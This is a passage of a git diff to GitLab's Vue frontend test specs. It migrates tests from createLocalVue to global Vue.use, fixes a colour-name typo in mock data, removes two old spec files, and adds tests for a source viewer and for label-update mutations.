'~/vue_shared/components/project_selector/project_selector.vue'; -const localVue = createLocalVue(); - describe('ProjectSelector component', () => { let wrapper; let vm; @@ -28,7 +26,6 @@ describe('ProjectSelector component', () => { beforeEach(() => { wrapper = mount(Vue.extend(ProjectSelector), { - localVue, propsData: { projectSearchResults: searchResults, selectedProjects: selected, diff --git a/spec/frontend/vue_shared/components/registry/metadata_item_spec.js b/spec/frontend/vue_shared/components/registry/metadata_item_spec.js index 1ccf3ddc5a5..e4abdc15fd5 100644 --- a/spec/frontend/vue_shared/components/registry/metadata_item_spec.js +++ b/spec/frontend/vue_shared/components/registry/metadata_item_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlLink } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import component from '~/vue_shared/components/registry/metadata_item.vue'; -import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate.vue'; +import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate/tooltip_on_truncate.vue'; describe('Metadata Item', () => { let wrapper; diff --git a/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js b/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js index 8536ffed573..e74a867ec97 100644 --- a/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js +++ b/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js @@ -1,7 +1,7 @@ import { GlAlert, GlModal, GlButton, GlLoadingIcon, GlSkeletonLoader } from '@gitlab/ui'; import { GlBreakpointInstance as bp } from '@gitlab/ui/dist/utils'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; @@ -16,8 +16,7 @@ import { mockGraphqlInstructionsWindows, } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); let resizeCallback; const MockResizeObserver = { @@ -33,7 +32,7 @@ const MockResizeObserver = { }, }; -localVue.directive('gl-resize-observer', MockResizeObserver); +Vue.directive('gl-resize-observer', MockResizeObserver); jest.mock('@gitlab/ui/dist/utils'); @@ -67,7 +66,6 @@ describe('RunnerInstructionsModal component', () => { registrationToken: 'MY_TOKEN', ...props, }, - localVue, apolloProvider: fakeApollo, ...options, }), diff --git a/spec/frontend/vue_shared/components/sidebar/collapsed_grouped_date_picker_spec.js b/spec/frontend/vue_shared/components/sidebar/collapsed_grouped_date_picker_spec.js deleted file mode 100644 index e72b3bf45c4..00000000000 --- a/spec/frontend/vue_shared/components/sidebar/collapsed_grouped_date_picker_spec.js +++ /dev/null @@ -1,103 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; - -import CollapsedGroupedDatePicker from '~/vue_shared/components/sidebar/collapsed_grouped_date_picker.vue'; -import CollapsedCalendarIcon from '~/vue_shared/components/sidebar/collapsed_calendar_icon.vue'; - -describe('CollapsedGroupedDatePicker', () => { - let wrapper; - - const defaultProps = { - showToggleSidebar: true, - }; - - const minDate = new Date('07/17/2016'); - const maxDate = new Date('07/17/2017'); - - const createComponent = ({ props = {} } = {}) => { - wrapper = shallowMount(CollapsedGroupedDatePicker, { - propsData: { ...defaultProps, ...props }, - }); - }; - - afterEach(() => { - wrapper.destroy(); - }); - - const findCollapsedCalendarIcon = () => wrapper.findComponent(CollapsedCalendarIcon); - const findAllCollapsedCalendarIcons = () => wrapper.findAllComponents(CollapsedCalendarIcon); - - describe('toggleCollapse events', () => { - it('should emit when collapsed-calendar-icon is clicked', () => { - createComponent(); - - findCollapsedCalendarIcon().trigger('click'); - - expect(wrapper.emitted('toggleCollapse')[0]).toBeDefined(); - }); - }); - - describe('minDate and maxDate', () => { - it('should render both collapsed-calendar-icon', () => { - createComponent({ - props: { - minDate, - maxDate, - }, - }); - - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(2); - expect(icons.at(0).text()).toBe('Jul 17 2016'); - expect(icons.at(1).text()).toBe('Jul 17 2017'); - }); - }); - - describe('minDate', () => { - it('should render minDate in collapsed-calendar-icon', () => { - createComponent({ - props: { - minDate, - }, - }); - - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(1); - expect(icons.at(0).text()).toBe('From Jul 17 2016'); - }); - }); - - describe('maxDate', () => { - it('should render maxDate in collapsed-calendar-icon', () => { - createComponent({ - props: { - maxDate, - }, - }); - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(1); - expect(icons.at(0).text()).toBe('Until Jul 17 2017'); - }); - }); - - describe('no dates', () => { - beforeEach(() => { - createComponent(); - }); - - it('should render None', () => { - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(1); - expect(icons.at(0).text()).toBe('None'); - }); - - it('should have tooltip as `Start and due date`', () => { - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.at(0).props('tooltipText')).toBe('Start and due date'); - }); - }); -}); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js index 59b170bfba9..c4ed975e746 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js @@ -1,5 +1,6 @@ import { GlIcon, GlButton } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import DropdownButton from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_button.vue'; @@ -9,8 +10,7 @@ import labelSelectModule from '~/vue_shared/components/sidebar/labels_select_vue import { mockConfig } from './mock_data'; let store; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig) => { store = new Vuex.Store(labelSelectModule()); @@ -18,7 +18,6 @@ const createComponent = (initialState = mockConfig) => { store.dispatch('setInitialState', initialState); return shallowMount(DropdownButton, { - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js index c4a645082e6..1fe85637a62 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js @@ -1,5 +1,6 @@ import { GlButton, GlFormInput, GlLink, GlLoadingIcon } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import DropdownContentsCreateView from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view.vue'; @@ -8,8 +9,7 @@ import labelSelectModule from '~/vue_shared/components/sidebar/labels_select_vue import { mockConfig, mockSuggestedColors } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig) => { const store = new Vuex.Store(labelSelectModule()); @@ -17,7 +17,6 @@ const createComponent = (initialState = mockConfig) => { store.dispatch('setInitialState', initialState); return shallowMount(DropdownContentsCreateView, { - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js index e39e8794fdd..80b8edd28ba 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js @@ -5,7 +5,8 @@ import { GlSearchBoxByType, GlLink, } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { UP_KEY_CODE, DOWN_KEY_CODE, ENTER_KEY_CODE, ESC_KEY_CODE } from '~/lib/utils/keycodes'; import DropdownContentsLabelsView from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view.vue'; @@ -18,8 +19,7 @@ import defaultState from '~/vue_shared/components/sidebar/labels_select_vue/stor import { mockConfig, mockLabels, mockRegularLabel } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('DropdownContentsLabelsView', () => { let wrapper; @@ -43,7 +43,6 @@ describe('DropdownContentsLabelsView', () => { store.dispatch('receiveLabelsSuccess', mockLabels); wrapper = shallowMount(DropdownContentsLabelsView, { - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js index 88557917cb5..9781d9c4de0 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js @@ -1,4 +1,5 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { DropdownVariant } from '~/vue_shared/components/sidebar/labels_select_vue/constants'; @@ -7,8 +8,7 @@ import labelsSelectModule from '~/vue_shared/components/sidebar/labels_select_vu import { mockConfig } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig, propsData = {}) => { const store = new Vuex.Store(labelsSelectModule()); @@ -17,7 +17,6 @@ const createComponent = (initialState = mockConfig, propsData = {}) => { return shallowMount(DropdownContents, { propsData, - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js index 726a113dbd9..110c1d1b7eb 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js @@ -1,5 +1,6 @@ import { GlButton, GlLoadingIcon } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import DropdownTitle from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_title.vue'; @@ -8,8 +9,7 @@ import labelsSelectModule from '~/vue_shared/components/sidebar/labels_select_vu import { mockConfig } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig) => { const store = new Vuex.Store(labelsSelectModule()); @@ -17,7 +17,6 @@ const createComponent = (initialState = mockConfig) => { store.dispatch('setInitialState', initialState); return shallowMount(DropdownTitle, { - localVue, store, propsData: { labelsSelectInProgress: false, diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js index 960ea77cb6e..f3c4839002b 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js @@ -1,5 +1,6 @@ import { GlLabel } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import DropdownValue from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_value.vue'; @@ -8,8 +9,7 @@ import labelsSelectModule from '~/vue_shared/components/sidebar/labels_select_vu import { mockConfig, mockLabels, mockRegularLabel, mockScopedLabel } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('DropdownValue', () => { let wrapper; @@ -23,7 +23,6 @@ describe('DropdownValue', () => { store.dispatch('setInitialState', { ...mockConfig, ...initialState }); wrapper = shallowMount(DropdownValue, { - localVue, store, slots, }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js index bc1ec8b812b..4b0ba075eda 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js @@ -1,4 +1,5 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { isInViewport } from '~/lib/utils/common_utils'; @@ -18,8 +19,7 @@ jest.mock('~/lib/utils/common_utils', () => ({ isInViewport: jest.fn().mockReturnValue(true), })); -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('LabelsSelectRoot', () => { let wrapper; @@ -27,7 +27,6 @@ describe('LabelsSelectRoot', () => { const createComponent = (config = mockConfig, slots = {}) => { wrapper = shallowMount(LabelsSelectRoot, { - localVue, slots, store, propsData: config, diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js index 1faa3b0af1d..884bc4684ba 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js @@ -75,7 +75,7 @@ export const mockSuggestedColors = { '#013220': 'Dark green', '#6699cc': 'Blue-gray', '#0000ff': 'Blue', - '#e6e6fa': 'Lavendar', + '#e6e6fa': 'Lavender', '#9400d3': 'Dark violet', '#330066': 'Deep violet', '#808080': 'Gray', diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js index bf873f9162b..d8491334b5d 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js @@ -1,6 +1,6 @@ import { GlLoadingIcon, GlLink } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -18,8 +18,7 @@ jest.mock('~/flash'); const colors = Object.keys(mockSuggestedColors); -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const userRecoverableError = { ...createLabelSuccessfulResponse, @@ -63,7 +62,6 @@ describe('DropdownContentsCreateView', () => { }); wrapper = shallowMount(DropdownContentsCreateView, { - localVue, apolloProvider: mockApollo, propsData: { fullPath: '', diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js index 2980409fdce..6f5a4b7e613 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js @@ -4,8 +4,8 @@ import { GlDropdownItem, GlIntersectionObserver, } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -19,8 +19,7 @@ import { mockConfig, workspaceLabelsQueryResponse } from './mock_data'; jest.mock('~/flash'); -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const localSelectedLabels = [ { @@ -47,7 +46,6 @@ describe('DropdownContentsLabelsView', () => { const mockApollo = createMockApollo([[projectLabelsQuery, queryHandler]]); wrapper = shallowMount(DropdownContentsLabelsView, { - localVue, apolloProvider: mockApollo, provide: { variant: DropdownVariant.Sidebar, diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js index 8bcef347c96..00da9b74957 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js @@ -4,12 +4,12 @@ import { DropdownVariant } from '~/vue_shared/components/sidebar/labels_select_w import DropdownContents from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents.vue'; import DropdownContentsCreateView from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view.vue'; import DropdownContentsLabelsView from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view.vue'; -import DropdownHeader from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_header.vue'; import DropdownFooter from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_footer.vue'; import { mockLabels } from './mock_data'; const showDropdown = jest.fn(); +const focusInput = jest.fn(); const GlDropdownStub = { template: ` @@ -25,6 +25,15 @@ const GlDropdownStub = { }, }; +const DropdownHeaderStub = { + template: ` + <div>Hello, I am a header</div> + `, + methods: { + focusInput, + }, +}; + describe('DropdownContent', () => { let wrapper; @@ -52,6 +61,7 @@ describe('DropdownContent', () => { }, stubs: { GlDropdown: GlDropdownStub, + DropdownHeader: DropdownHeaderStub, }, }); }; @@ -62,7 +72,7 @@ describe('DropdownContent', () => { const findCreateView = () => wrapper.findComponent(DropdownContentsCreateView); const findLabelsView = () => wrapper.findComponent(DropdownContentsLabelsView); - const findDropdownHeader = () => wrapper.findComponent(DropdownHeader); + const findDropdownHeader = () => wrapper.findComponent(DropdownHeaderStub); const findDropdownFooter = () => wrapper.findComponent(DropdownFooter); const findDropdown = () => wrapper.findComponent(GlDropdownStub); @@ -114,19 +124,7 @@ describe('DropdownContent', () => { expect(wrapper.emitted('setLabels')).toEqual([[[updatedLabel]]]); }); - it('does not render header on standalone variant', () => { - createComponent({ props: { variant: DropdownVariant.Standalone } }); - - expect(findDropdownHeader().exists()).toBe(false); - }); - - it('renders header on embedded variant', () => { - createComponent({ props: { variant: DropdownVariant.Embedded } }); - - expect(findDropdownHeader().exists()).toBe(true); - }); - - it('renders header on sidebar variant', () => { + it('renders header', () => { createComponent(); expect(findDropdownHeader().exists()).toBe(true); @@ -135,11 +133,20 @@ describe('DropdownContent', () => { it('sets searchKey for labels view on input event from header', async () => { createComponent(); - expect(wrapper.vm.searchKey).toEqual(''); + expect(findLabelsView().props('searchKey')).toBe(''); findDropdownHeader().vm.$emit('input', '123'); await nextTick(); - expect(findLabelsView().props('searchKey')).toEqual('123'); + expect(findLabelsView().props('searchKey')).toBe('123'); + }); + + it('clears and focuses search input on selecting a label', () => { + createComponent(); + findDropdownHeader().vm.$emit('input', '123'); + findLabelsView().vm.$emit('input', []); + + expect(findLabelsView().props('searchKey')).toBe(''); + expect(focusInput).toHaveBeenCalled(); }); describe('Create view', () => { diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js index 592559ef305..c4faef8ccdd 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js @@ -9,6 +9,7 @@ describe('DropdownHeader', () => { const createComponent = ({ showDropdownContentsCreateView = false, labelsFetchInProgress = false, + isStandalone = false, } = {}) => { wrapper = extendedWrapper( shallowMount(DropdownHeader, { @@ -18,6 +19,7 @@ describe('DropdownHeader', () => { labelsCreateTitle: 'Create label', labelsListTitle: 'Select label', searchKey: '', + isStandalone, }, stubs: { GlSearchBoxByType, @@ -32,6 +34,7 @@ describe('DropdownHeader', () => { const findSearchInput = () => wrapper.findComponent(GlSearchBoxByType); const findGoBackButton = () => wrapper.findByTestId('go-back-button'); + const findDropdownTitle = () => wrapper.findByTestId('dropdown-header-title'); beforeEach(() => { createComponent(); @@ -72,4 +75,18 @@ describe('DropdownHeader', () => { }, ); }); + + describe('Standalone variant', () => { + beforeEach(() => { + createComponent({ isStandalone: true }); + }); + + it('renders search input', () => { + expect(findSearchInput().exists()).toBe(true); + }); + + it('does not render title', async () => { + expect(findDropdownTitle().exists()).toBe(false); + }); + }); }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js index e7e78cd7a33..0c4f4b7d504 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js @@ -95,5 +95,10 @@ describe('DropdownValue', () => { findRegularLabel().vm.$emit('close'); expect(wrapper.emitted('onLabelRemove')).toEqual([[mockRegularLabel.id]]); }); + + it('emits `onCollapsedValueClick` when clicking on collapsed value', () => { + wrapper.find('.sidebar-collapsed-icon').trigger('click'); + expect(wrapper.emitted('onCollapsedValueClick')).toEqual([[]]); + }); }); }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js index d4203528874..a4199bb3e27 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js @@ -1,25 +1,34 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import SidebarEditableItem from '~/sidebar/components/sidebar_editable_item.vue'; import DropdownContents from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents.vue'; import DropdownValue from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_value.vue'; import issueLabelsQuery from '~/vue_shared/components/sidebar/labels_select_widget/graphql/issue_labels.query.graphql'; +import updateIssueLabelsMutation from '~/boards/graphql/issue_set_labels.mutation.graphql'; +import updateMergeRequestLabelsMutation from '~/sidebar/queries/update_merge_request_labels.mutation.graphql'; +import updateEpicLabelsMutation from '~/vue_shared/components/sidebar/labels_select_widget/graphql/epic_update_labels.mutation.graphql'; import LabelsSelectRoot from '~/vue_shared/components/sidebar/labels_select_widget/labels_select_root.vue'; -import { mockConfig, issuableLabelsQueryResponse } from './mock_data'; +import { mockConfig, issuableLabelsQueryResponse, updateLabelsMutationResponse } from './mock_data'; jest.mock('~/flash'); -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const successfulQueryHandler = jest.fn().mockResolvedValue(issuableLabelsQueryResponse); +const successfulMutationHandler = jest.fn().mockResolvedValue(updateLabelsMutationResponse); const errorQueryHandler = jest.fn().mockRejectedValue('Houston, we have a problem'); +const updateLabelsMutation = { + [IssuableType.Issue]: updateIssueLabelsMutation, + [IssuableType.MergeRequest]: updateMergeRequestLabelsMutation, + [IssuableType.Epic]: updateEpicLabelsMutation, +}; + describe('LabelsSelectRoot', () => { let wrapper; @@ -30,17 +39,21 @@ describe('LabelsSelectRoot', () => { const createComponent = ({ config = mockConfig, slots = {}, + issuableType = IssuableType.Issue, queryHandler = successfulQueryHandler, + mutationHandler = successfulMutationHandler, } = {}) => { - const mockApollo = createMockApollo([[issueLabelsQuery, queryHandler]]); + const mockApollo = createMockApollo([ + [issueLabelsQuery, queryHandler], + [updateLabelsMutation[issuableType], mutationHandler], + ]); wrapper = shallowMount(LabelsSelectRoot, { slots, apolloProvider: mockApollo, - localVue, propsData: { ...config, - issuableType: IssuableType.Issue, + issuableType, labelCreateType: 'project', workspaceType: 'project', }, @@ -60,9 +73,9 @@ describe('LabelsSelectRoot', () => { wrapper.destroy(); }); - it('renders component with classes `labels-select-wrapper position-relative`', () => { + it('renders component with classes `labels-select-wrapper gl-relative`', () => { createComponent(); - expect(wrapper.classes()).toEqual(['labels-select-wrapper', 'position-relative']); + expect(wrapper.classes()).toEqual(['labels-select-wrapper', 'gl-relative']); }); it.each` @@ -130,4 +143,46 @@ describe('LabelsSelectRoot', () => { findDropdownContents().vm.$emit('setLabels', [label]); expect(wrapper.emitted('updateSelectedLabels')).toEqual([[{ labels: [label] }]]); }); + + describe.each` + issuableType + ${IssuableType.Issue} + ${IssuableType.MergeRequest} + ${IssuableType.Epic} + `('when updating labels for $issuableType', ({ issuableType }) => { + const label = { id: 'gid://gitlab/ProjectLabel/2' }; + + it('sets the loading state', async () => { + createComponent({ issuableType }); + await nextTick(); + findDropdownContents().vm.$emit('setLabels', [label]); + await nextTick(); + + expect(findSidebarEditableItem().props('loading')).toBe(true); + }); + + it('updates labels correctly after successful mutation', async () => { + createComponent({ issuableType }); + await nextTick(); + findDropdownContents().vm.$emit('setLabels', [label]); + await waitForPromises(); + + expect(findDropdownValue().props('selectedLabels')).toEqual( + updateLabelsMutationResponse.data.updateIssuableLabels.issuable.labels.nodes, + ); + }); + + it('displays an error if mutation was rejected', async () => { + createComponent({ issuableType, mutationHandler: errorQueryHandler }); + await nextTick(); + findDropdownContents().vm.$emit('setLabels', [label]); + await waitForPromises(); + + expect(createFlash).toHaveBeenCalledWith({ + captureError: true, + error: expect.anything(), + message: 'An error occurred while updating labels.', + }); + }); + }); }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js index 5c5bf5f2187..6ef54ce37ce 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js @@ -118,7 +118,9 @@ export const workspaceLabelsQueryResponse = { export const issuableLabelsQueryResponse = { data: { workspace: { + id: 'workspace-1', issuable: { + __typename: 'Issue', id: '1', labels: { nodes: [ @@ -135,3 +137,18 @@ export const issuableLabelsQueryResponse = { }, }, }; + +export const updateLabelsMutationResponse = { + data: { + updateIssuableLabels: { + errors: [], + issuable: { + __typename: 'Issue', + id: '1', + labels: { + nodes: [], + }, + }, + }, + }, +}; diff --git a/spec/frontend/vue_shared/components/source_viewer_spec.js b/spec/frontend/vue_shared/components/source_viewer_spec.js new file mode 100644 index 00000000000..758068379de --- /dev/null +++ b/spec/frontend/vue_shared/components/source_viewer_spec.js @@ -0,0 +1,59 @@ +import hljs from 'highlight.js/lib/core'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import SourceViewer from '~/vue_shared/components/source_viewer.vue'; +import LineNumbers from '~/vue_shared/components/line_numbers.vue'; +import waitForPromises from 'helpers/wait_for_promises'; + +jest.mock('highlight.js/lib/core'); + +describe('Source Viewer component', () => { + let wrapper; + const content = `// Some source code`; + const highlightedContent = `<span data-testid='test-highlighted'>${content}</span>`; + const language = 'javascript'; + + hljs.highlight.mockImplementation(() => ({ value: highlightedContent })); + hljs.highlightAuto.mockImplementation(() => ({ value: highlightedContent })); + + const createComponent = async (props = {}) => { + wrapper = shallowMountExtended(SourceViewer, { propsData: { content, language, ...props } }); + await waitForPromises(); + }; + + const findLineNumbers = () => wrapper.findComponent(LineNumbers); + const findHighlightedContent = () => wrapper.findByTestId('test-highlighted'); + + beforeEach(() => createComponent()); + + afterEach(() => wrapper.destroy()); + + describe('highlight.js', () => { + it('registers the language definition', async () => { + const languageDefinition = await import(`highlight.js/lib/languages/${language}`); + + expect(hljs.registerLanguage).toHaveBeenCalledWith(language, languageDefinition.default); + }); + + it('highlights the content', () => { + expect(hljs.highlight).toHaveBeenCalledWith(content, { language }); + }); + + describe('auto-detect enabled', () => { + beforeEach(() => createComponent({ autoDetect: true })); + + it('highlights the content with auto-detection', () => { + expect(hljs.highlightAuto).toHaveBeenCalledWith(content); + }); + }); + }); + + describe('rendering', () => { + it('renders Line Numbers', () => { + expect(findLineNumbers().props('lines')).toBe(1); + }); + + it('renders the highlighted content', () => { + expect(findHighlightedContent().exists()).toBe(true); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/storage_counter/usage_graph_spec.js b/spec/frontend/vue_shared/components/storage_counter/usage_graph_spec.js deleted file mode 100644 index 103eee4b9a8..00000000000 --- a/spec/frontend/vue_shared/components/storage_counter/usage_graph_spec.js +++ /dev/null @@ -1,137 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; -import { numberToHumanSize } from '~/lib/utils/number_utils'; -import UsageGraph from '~/vue_shared/components/storage_counter/usage_graph.vue'; - -let data; -let wrapper; - -function mountComponent({ rootStorageStatistics, limit }) { - wrapper = shallowMount(UsageGraph, { - propsData: { - rootStorageStatistics, - limit, - }, - }); -} -function findStorageTypeUsagesSerialized() { - return wrapper - .findAll('[data-testid="storage-type-usage"]') - .wrappers.map((wp) => wp.element.style.flex); -} - -describe('Storage Counter usage graph component', () => { - 